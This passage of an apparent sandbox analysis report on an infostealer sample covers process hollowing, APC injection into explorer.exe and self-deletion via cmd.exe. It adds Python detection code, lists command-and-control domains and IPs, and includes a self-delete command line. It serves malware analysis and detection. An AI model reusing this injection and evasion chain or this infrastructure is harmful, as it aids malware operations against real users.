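          Read together, the lines in this section are one chain: the dropper starts a second copy of itself and writes a PE image (the `4D5A` header) at base 0x400000 into it; the payload then maps RWX sections into wlanext.exe and explorer.exe, unmaps wlanext.exe's original image at 0xFE0000 and sets a thread context (process hollowing), and queues an APC into explorer.exe; explorer.exe, not the dropper, does the port-80 connections to the hosts listed, and the hollowed wlanext.exe spawns `cmd.exe /c del` to remove the dropper from disk. The Python below is an added example, not Joe Sandbox output or FormBook code: it runs three detections for that chain over constructed telemetry modelled on these behaviour lines. The event schema, field names and PIDs are assumptions made for the example; the paths and addresses are the report's.

```python
"""Detections for the injection / evasion chain in this section (added example).

The event schema is an assumption for this example, not Joe Sandbox or Sysmon
output. PIDs are invented; image paths and IPs are those listed in the report.
"""
import ipaddress
import re
from collections import defaultdict

DROPPER = r"C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exe"
EXPLORER = r"C:\Windows\explorer.exe"
WLANEXT = r"C:\Windows\SysWOW64\wlanext.exe"
REPORTED_IPS = ["103.224.212.213", "3.64.163.50", "185.151.30.212", "198.185.159.144",
                "128.1.131.130", "188.114.97.3", "154.204.100.23", "216.83.55.173",
                "103.8.70.95"]

# Constructed telemetry modelled on the behaviour lines above.
EVENTS = [
    {"type": "process_create", "pid": 2, "ppid": 1, "image": DROPPER, "cmdline": f'"{DROPPER}"'},
    {"type": "process_create", "pid": 3, "ppid": 2, "image": DROPPER, "cmdline": f'"{DROPPER}"'},
    # RunPE into the child copy: MZ header written at the image base, thread redirected
    {"type": "memory_write", "pid": 2, "target_pid": 3, "target_image": DROPPER,
     "base": 0x400000, "first_bytes": b"MZ\x90\x00"},
    {"type": "thread_context_set", "pid": 2, "target_pid": 3, "target_image": DROPPER},
    # hollowing of wlanext.exe: original image unmapped, RWX section mapped, thread redirected
    {"type": "process_create", "pid": 5, "ppid": 3, "image": WLANEXT, "cmdline": WLANEXT},
    {"type": "section_unmapped", "pid": 3, "target_pid": 5, "target_image": WLANEXT, "base": 0xFE0000},
    {"type": "section_mapped", "pid": 3, "target_pid": 5, "target_image": WLANEXT, "protection": "rwx"},
    {"type": "thread_context_set", "pid": 3, "target_pid": 5, "target_image": WLANEXT},
    # APC injection into explorer.exe, which does the networking afterwards
    {"type": "section_mapped", "pid": 3, "target_pid": 4, "target_image": EXPLORER, "protection": "rwx"},
    {"type": "apc_queued", "pid": 3, "target_pid": 4, "target_image": EXPLORER},
] + [
    {"type": "network_connect", "pid": 4, "image": EXPLORER, "dst_ip": ip, "dst_port": 80}
    for ip in REPORTED_IPS
] + [
    # intranet SMB from explorer.exe: ordinary shell behaviour, must not count as beaconing
    {"type": "network_connect", "pid": 4, "image": EXPLORER, "dst_ip": "10.0.0.5", "dst_port": 445},
    # the hollowed wlanext.exe deletes the dropper
    {"type": "process_create", "pid": 6, "ppid": 5, "image": r"C:\Windows\SysWOW64\cmd.exe",
     "cmdline": f'cmd.exe /c del "{DROPPER}"'},
]

DEL_RE = re.compile(r'\bdel\s+"?(?P<path>[^"]+?)"?\s*$', re.IGNORECASE)


def detect_hollowing(events):
    """(writer, target, image) pairs where the target's image was replaced (MZ header
    written, or its mapped image unmapped) and a thread context was then set on it."""
    replaced, redirected, image = set(), set(), {}
    for e in events:
        key = (e.get("pid"), e.get("target_pid"))
        if e["type"] == "memory_write" and e["first_bytes"].startswith(b"MZ"):
            replaced.add(key)
        elif e["type"] == "section_unmapped":
            replaced.add(key)
        elif e["type"] == "thread_context_set":
            redirected.add(key)
        if "target_image" in e:
            image[key] = e["target_image"]
    return sorted((w, t, image[(w, t)]) for w, t in replaced & redirected)


def detect_injected_shell_beaconing(events, shell=EXPLORER, min_hosts=3, ports=(80, 443)):
    """The shell, after receiving code from another process (RWX section mapped or APC
    queued into it), connecting to at least min_hosts distinct public hosts on web ports."""
    injected = {e["target_pid"] for e in events
                if e["type"] in ("apc_queued", "section_mapped")
                and e.get("target_image", "").lower() == shell.lower()}
    hosts = defaultdict(set)
    for e in events:
        if (e["type"] == "network_connect" and e["pid"] in injected
                and e["dst_port"] in ports and ipaddress.ip_address(e["dst_ip"]).is_global):
            hosts[e["pid"]].add(e["dst_ip"])
    return {pid: sorted(ips) for pid, ips in hosts.items() if len(ips) >= min_hosts}


def detect_self_delete(events):
    """cmd.exe deleting the image of a process seen earlier in the chain; returns
    (cmd pid, parent image, deleted path) so the deleting parent is visible."""
    by_pid = {e["pid"]: e["image"] for e in events if e["type"] == "process_create"}
    images = {img.lower() for img in by_pid.values()}
    hits = []
    for e in events:
        if e["type"] != "process_create" or not e["image"].lower().endswith("\\cmd.exe"):
            continue
        m = DEL_RE.search(e["cmdline"])
        if m and m.group("path").lower() in images:
            hits.append((e["pid"], by_pid.get(e["ppid"]), m.group("path")))
    return hits


def run_all(events):
    return {"hollowing": detect_hollowing(events),
            "injected_shell_beaconing": detect_injected_shell_beaconing(events),
            "self_delete": detect_self_delete(events)}


if __name__ == "__main__":
    for name, result in run_all(EVENTS).items():
        print(f"{name}: {result}")
```

          The point of requiring two indicators per detection (image replaced and thread redirected; code injected and then beaconing; deletion of a path that belongs to a process in the chain) is that each single event here has benign look-alikes: debuggers set thread contexts, explorer.exe talks to the network constantly, and installers delete their own temporary files.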
Source: explorer.exe, 00000004.00000003.3098476432.0000000009C21000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3098065936.0000000009BB0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3094852288.0000000009BA0000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: Shell_TrayWnd=
Source: explorer.exe, 00000004.00000000.2003135790.0000000001731000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000002.4450083102.0000000001731000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Program Manager
Source: explorer.exe, 00000004.00000000.2003135790.0000000001731000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000000.2004994138.0000000004B00000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4450083102.0000000001731000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000004.00000000.2003135790.0000000001731000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000002.4450083102.0000000001731000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progman
Source: explorer.exe, 00000004.00000000.2003135790.0000000001731000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000002.4450083102.0000000001731000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progmanlock
Source: explorer.exe, 00000004.00000002.4449069859.0000000000EF0000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.2002630977.0000000000EF0000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: PProgman
Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exe | Queries volume information: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exe VolumeInformation
Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exe | Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 5_2_00FEFF45 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,5_2_00FEFF45
Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

          Stealing of Sensitive Information

Source: Yara match | File source: 3.2.tYEY1UeurGz0Mjb.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.2.tYEY1UeurGz0Mjb.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000003.00000002.2047920675.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.4449543692.0000000003070000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.4449038792.0000000000BB0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.4449465377.0000000003040000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.2001523067.000000000467E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

          Remote Access Functionality

Source: Yara match | File source: 3.2.tYEY1UeurGz0Mjb.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.2.tYEY1UeurGz0Mjb.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000003.00000002.2047920675.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.4449543692.0000000003070000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.4449038792.0000000000BB0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.4449465377.0000000003040000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.2001523067.000000000467E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 5_2_00FEF160 RtlStringFromGUID,RtlNtStatusToDosError,memcpy,RtlFreeUnicodeString,CreateFileW,GetLastError,BindIoCompletionCallback,GetLastError,CloseHandle,5_2_00FEF160
          ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
          Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
          Shared Modules
          1
          DLL Side-Loading
          1
          Abuse Elevation Control Mechanism
          1
          Disable or Modify Tools
          1
          Credential API Hooking
          1
          System Time Discovery
          Remote Services1
          Archive Collected Data
          4
          Ingress Tool Transfer
          Exfiltration Over Other Network MediumAbuse Accessibility Features
          CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
          DLL Side-Loading
          1
          Deobfuscate/Decode Files or Information
          LSASS Memory1
          File and Directory Discovery
          Remote Desktop Protocol1
          Credential API Hooking
          1
          Encrypted Channel
          Exfiltration Over BluetoothNetwork Denial of Service
          Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
          Access Token Manipulation
          1
          Abuse Elevation Control Mechanism
          Security Account Manager213
          System Information Discovery
          SMB/Windows Admin SharesData from Network Shared Drive3
          Non-Application Layer Protocol
          Automated ExfiltrationData Encrypted for Impact
          Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook612
          Process Injection
          4
          Obfuscated Files or Information
          NTDS231
          Security Software Discovery
          Distributed Component Object ModelInput Capture13
          Application Layer Protocol
          Traffic DuplicationData Destruction
          Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script12
          Software Packing
          LSA Secrets2
          Process Discovery
          SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
          Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
          Timestomp
          Cached Domain Credentials41
          Virtualization/Sandbox Evasion
          VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
          DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
          DLL Side-Loading
          DCSync1
          Application Window Discovery
          Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
          Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
          Rootkit
          Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
          Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
          Masquerading
          /etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
          IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron41
          Virtualization/Sandbox Evasion
          Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
          Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd1
          Access Token Manipulation
          Input CaptureSystem Network Connections DiscoverySoftware Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption
          Gather Victim Org InformationDNS ServerCompromise Software Supply ChainWindows Command ShellScheduled TaskScheduled Task612
          Process Injection
          KeyloggingProcess DiscoveryTaint Shared ContentScreen CaptureDNSExfiltration Over Physical MediumResource Hijacking

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
Behavior Graph (ID: 1467706, sample: tYEY1UeurGz0Mjb.exe, start date: 04/07/2024, architecture: WINDOWS, score: 100). Recoverable content of the rendered graph, flattened into the process chain it shows:

• Start node: contacted www.mrwine.xyz, www.cfuhtkwo.xyz and 16 other IPs or domains; signatures: Snort IDS alert for network traffic; Found malware configuration; Malicious sample detected (through community Yara rule); 9 other signatures; Performs DNS queries to domains with low reputation (www.cfuhtkwo.xyz)
• tYEY1UeurGz0Mjb.exe (started): dropped C:\Users\user\...\tYEY1UeurGz0Mjb.exe.log (ASCII); signatures: Tries to detect virtualization through RDTSC time measurements; Injects a PE file into a foreign processes; Switches to a custom stack to bypass stack traces
• tYEY1UeurGz0Mjb.exe (child, started): signatures: Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Sample uses process hollowing technique; 2 other signatures
• explorer.exe (injected): contacted 021562413z.greycdn.net (128.1.131.130, ports 49723, 80, UHGL-AS-APUCloudHKHoldingsGroupLimitedHK, United States), www.cpuk-finance.com (185.151.30.212, ports 49719, 80, TWENTYIGB, United Kingdom) and 7 other IPs or domains; signature: System process connects to network (likely due to code injection or exploit)
• wlanext.exe (started): signatures: Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Tries to detect virtualization through RDTSC time measurements; Switches to a custom stack to bypass stack traces
• cmd.exe (started)
• conhost.exe (started)



Source | Detection | Scanner | Label | Link
tYEY1UeurGz0Mjb.exe | 32% | ReversingLabs | - | -
tYEY1UeurGz0Mjb.exe | 100% | Joe Sandbox ML | - | -
          No Antivirus matches
          No Antivirus matches
          No Antivirus matches
Source | Detection | Scanner | Label | Link
https://excel.office.com | 0% | URL Reputation | safe | -
http://schemas.micro | 0% | URL Reputation | safe | -
https://android.notify.windows.com/iOS | 0% | URL Reputation | safe | -
https://api.msn.com/ | 0% | URL Reputation | safe | -
http://www.byfchfyr.xyzReferer: | 0% | Avira URL Cloud | safe | -
http://www.whysco.com | 0% | Avira URL Cloud | safe | -
http://www.txglobedev.com/dy13/www.whysco.com | 0% | Avira URL Cloud | safe | -
http://www.jesuscrewofficial.com/dy13/ | 0% | Avira URL Cloud | safe | -
http://www.520yhy.com | 0% | Avira URL Cloud | safe | -
http://www.yr8gl32.vip | 0% | Avira URL Cloud | safe | -
http://www.byfchfyr.xyz | 0% | Avira URL Cloud | safe | -
http://www.nestormediaproduction.com/dy13/ | 0% | Avira URL Cloud | safe | -
https://powerpoint.office.comcember | 0% | Avira URL Cloud | safe | -
https://word.office.comon | 0% | Avira URL Cloud | safe | -
http://www.yr8gl32.vip/dy13/www.cfuhtkwo.xyz | 0% | Avira URL Cloud | safe | -
http://www.cioncarp4213.com/dy13/ | 0% | Avira URL Cloud | safe | -
http://www.520yhy.com/dy13/ | 0% | Avira URL Cloud | safe | -
http://www.cpuk-finance.comReferer: | 0% | Avira URL Cloud | safe | -
http://www.cfuhtkwo.xyz/dy13/ | 0% | Avira URL Cloud | safe | -
http://www.yr8gl32.vipReferer: | 0% | Avira URL Cloud | safe | -
http://www.cpuk-finance.com/dy13/www.nearmeacupuncture.com | 0% | Avira URL Cloud | safe | -
http://www.bum-arch.com | 0% | Avira URL Cloud | safe | -
http://www.northshorehousekeeping.com/dy13/f | 0% | Avira URL Cloud | safe | -
http://www.cioncarp4213.com | 0% | Avira URL Cloud | safe | -
http://www.nestormediaproduction.comReferer: | 0% | Avira URL Cloud | safe | -
https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppcrobat.exe | 0% | Avira URL Cloud | safe | -
http://www.cpuk-finance.com | 0% | Avira URL Cloud | safe | -
http://www.bum-arch.com/dy13/www.northshorehousekeeping.com | 0% | Avira URL Cloud | safe | -
http://www.whysco.com/dy13/www.jesuscrewofficial.com | 0% | Avira URL Cloud | safe | -
http://www.serco2020.com/dy13/www.mrwine.xyz | 0% | Avira URL Cloud | safe | -
http://www.nestormediaproduction.com | 0% | Avira URL Cloud | safe | -
https://wns.windows.com/)s | 0% | Avira URL Cloud | safe | -
http://www.yr8gl32.vip/dy13/ | 0% | Avira URL Cloud | safe | -
http://www.bum-arch.com/dy13/ | 0% | Avira URL Cloud | safe | -
http://www.mrwine.xyz/dy13/ | 0% | Avira URL Cloud | safe | -
http://www.nearmeacupuncture.com | 0% | Avira URL Cloud | safe | -
http://www.northshorehousekeeping.com/dy13/ | 0% | Avira URL Cloud | safe | -
http://www.nearmeacupuncture.com/dy13/ | 0% | Avira URL Cloud | safe | -
http://www.nearmeacupuncture.com/dy13/www.serco2020.com | 0% | Avira URL Cloud | safe | -
http://www.tyupok.xyz | 0% | Avira URL Cloud | safe | -
http://www.mrwine.xyz | 0% | Avira URL Cloud | safe | -
http://www.byfchfyr.xyz/dy13/www.txglobedev.com | 0% | Avira URL Cloud | safe | -
http://www.byfchfyr.xyz/dy13/ | 0% | Avira URL Cloud | safe | -
http://www.jesuscrewofficial.com/dy13/www.nestormediaproduction.com | 0% | Avira URL Cloud | safe | -
http://www.cioncarp4213.com/dy13/www.520yhy.com | 0% | Avira URL Cloud | safe | -
http://www.cfuhtkwo.xyzReferer: | 0% | Avira URL Cloud | safe | -
http://www.tyupok.xyzReferer: | 0% | Avira URL Cloud | safe | -
http://www.mrwine.xyzReferer: | 0% | Avira URL Cloud | safe | -
https://outlook.com | 0% | Avira URL Cloud | safe | -
http://www.cioncarp4213.comReferer: | 0% | Avira URL Cloud | safe | -
http://www.bum-arch.comReferer: | 0% | Avira URL Cloud | safe | -
http://www.northshorehousekeeping.com | 0% | Avira URL Cloud | safe | -
http://www.jesuscrewofficial.com | 0% | Avira URL Cloud | safe | -
http://www.520yhy.com/dy13/www.byfchfyr.xyz | 0% | Avira URL Cloud | safe | -
http://www.520yhy.comReferer: | 0% | Avira URL Cloud | safe | -
http://www.whysco.com/dy13/ | 0% | Avira URL Cloud | safe | -
http://www.serco2020.com/dy13/ | 0% | Avira URL Cloud | safe | -
http://www.serco2020.comReferer: | 0% | Avira URL Cloud | safe | -
http://www.jesuscrewofficial.comReferer: | 0% | Avira URL Cloud | safe | -
http://www.tyupok.xyz/dy13/ | 0% | Avira URL Cloud | safe | -
http://www.cfuhtkwo.xyz | 0% | Avira URL Cloud | safe | -
http://www.txglobedev.comReferer: | 0% | Avira URL Cloud | safe | -
http://www.northshorehousekeeping.comReferer: | 0% | Avira URL Cloud | safe | -
http://www.txglobedev.com/dy13/ | 0% | Avira URL Cloud | safe | -
http://www.tyupok.xyz/dy13/www.cpuk-finance.com | 0% | Avira URL Cloud | safe | -
http://www.cpuk-finance.com/dy13/ | 0% | Avira URL Cloud | safe | -
http://www.nearmeacupuncture.comReferer: | 0% | Avira URL Cloud | safe | -
http://www.serco2020.com | 0% | Avira URL Cloud | safe | -
http://www.nestormediaproduction.com/dy13/www.bum-arch.com | 0% | Avira URL Cloud | safe | -
http://crl.v | 0% | Avira URL Cloud | safe | -
www.cpuk-finance.com/dy13/ | 0% | Avira URL Cloud | safe | -
http://www.whysco.comReferer: | 0% | Avira URL Cloud | safe | -
http://www.mrwine.xyz/dy13/www.cioncarp4213.com | 0% | Avira URL Cloud | safe | -
http://www.txglobedev.com | 0% | Avira URL Cloud | safe | -
http://www.cfuhtkwo.xyz/dy13/www.tyupok.xyz | 0% | Avira URL Cloud | safe | -
Name | IP | Active | Malicious | Antivirus Detection | Reputation
www.cfuhtkwo.xyz | 154.204.100.23 | true | true | - | unknown
www.mrwine.xyz | 3.64.163.50 | true | true | - | unknown
www.520yhy.com | 103.8.70.95 | true | true | - | unknown
winter.qnwoocaijo.com | 216.83.55.173 | true | true | - | unknown
www.serco2020.com | 103.224.212.213 | true | true | - | unknown
www.txglobedev.com | 188.114.97.3 | true | true | - | unknown
www.cpuk-finance.com | 185.151.30.212 | true | true | - | unknown
www.whysco.com | 91.195.240.123 | true | true | - | unknown
ext-sq.squarespace.com | 198.185.159.144 | true | true | - | unknown
shops.myshopify.com | 23.227.38.74 | true | true | - | unknown
021562413z.greycdn.net | 128.1.131.130 | true | true | - | unknown
www.cioncarp4213.com | unknown | unknown | true | - | unknown
www.yr8gl32.vip | unknown | unknown | true | - | unknown
www.nearmeacupuncture.com | unknown | unknown | true | - | unknown
www.jesuscrewofficial.com | unknown | unknown | true | - | unknown
www.byfchfyr.xyz | unknown | unknown | true | - | unknown
Name | Malicious | Antivirus Detection | Reputation
www.cpuk-finance.com/dy13/ | true | Avira URL Cloud: safe | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
https://word.office.comon | explorer.exe, 00000004.00000000.2007606048.00000000099C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4454444252.00000000099B0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3094852288.00000000099C0000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.byfchfyr.xyzReferer: | explorer.exe, 00000004.00000002.4457795777.000000000C81C000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://powerpoint.office.comcember | explorer.exe, 00000004.00000000.2009295246.000000000C460000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4457096271.000000000C460000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.jesuscrewofficial.com/dy13/ | explorer.exe, 00000004.00000002.4457795777.000000000C81C000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.whysco.com | explorer.exe, 00000004.00000002.4457795777.000000000C81C000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://excel.office.com | explorer.exe, 00000004.00000003.3098476432.0000000009C21000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3098065936.0000000009BB0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3094852288.0000000009BA0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.2007606048.0000000009BA0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4455199777.0000000009C22000.00000004.00000001.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://schemas.micro | explorer.exe, 00000004.00000000.2006094320.0000000007DC0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000000.2007043460.0000000008870000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000002.4454060731.0000000008890000.00000002.00000001.00040000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.yr8gl32.vip | explorer.exe, 00000004.00000002.4457795777.000000000C81C000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.520yhy.com | explorer.exe, 00000004.00000002.4457795777.000000000C81C000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.nestormediaproduction.com/dy13/ | explorer.exe, 00000004.00000002.4457795777.000000000C81C000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.txglobedev.com/dy13/www.whysco.com | explorer.exe, 00000004.00000002.4457795777.000000000C81C000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.byfchfyr.xyz | explorer.exe, 00000004.00000002.4457795777.000000000C81C000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.cioncarp4213.com/dy13/ | explorer.exe, 00000004.00000002.4457795777.000000000C81C000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.yr8gl32.vip/dy13/www.cfuhtkwo.xyz | explorer.exe, 00000004.00000002.4457795777.000000000C81C000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.cpuk-finance.com/dy13/www.nearmeacupuncture.com | explorer.exe, 00000004.00000002.4457795777.000000000C81C000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.northshorehousekeeping.com/dy13/f | explorer.exe, 00000004.00000002.4457795777.000000000C81C000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.cpuk-finance.comReferer: | explorer.exe, 00000004.00000002.4457795777.000000000C81C000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.yr8gl32.vipReferer: | explorer.exe, 00000004.00000002.4457795777.000000000C81C000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.cfuhtkwo.xyz/dy13/ | explorer.exe, 00000004.00000002.4457795777.000000000C81C000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.520yhy.com/dy13/ | explorer.exe, 00000004.00000002.4457795777.000000000C81C000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.bum-arch.com | explorer.exe, 00000004.00000002.4457795777.000000000C81C000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.cioncarp4213.com | explorer.exe, 00000004.00000002.4457795777.000000000C81C000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.nestormediaproduction.comReferer: | explorer.exe, 00000004.00000002.4457795777.000000000C81C000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppcrobat.exe | explorer.exe, 00000004.00000002.4457096271.000000000C4DC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.2009295246.000000000C4DC000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.cpuk-finance.com | explorer.exe, 00000004.00000002.4457795777.000000000C81C000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.bum-arch.com/dy13/www.northshorehousekeeping.com | explorer.exe, 00000004.00000002.4457795777.000000000C81C000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.serco2020.com/dy13/www.mrwine.xyz | explorer.exe, 00000004.00000002.4457795777.000000000C81C000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.whysco.com/dy13/www.jesuscrewofficial.com | explorer.exe, 00000004.00000002.4457795777.000000000C81C000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.bum-arch.com/dy13/ | explorer.exe, 00000004.00000002.4457795777.000000000C81C000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://wns.windows.com/)s | explorer.exe, 00000004.00000000.2007606048.00000000099C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4454444252.00000000099B0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3094852288.00000000099C0000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.yr8gl32.vip/dy13/ | explorer.exe, 00000004.00000002.4457795777.000000000C81C000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.nestormediaproduction.com | explorer.exe, 00000004.00000002.4457795777.000000000C81C000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.mrwine.xyz/dy13/ | explorer.exe, 00000004.00000002.4457795777.000000000C81C000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.nearmeacupuncture.com | explorer.exe, 00000004.00000002.4457795777.000000000C81C000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
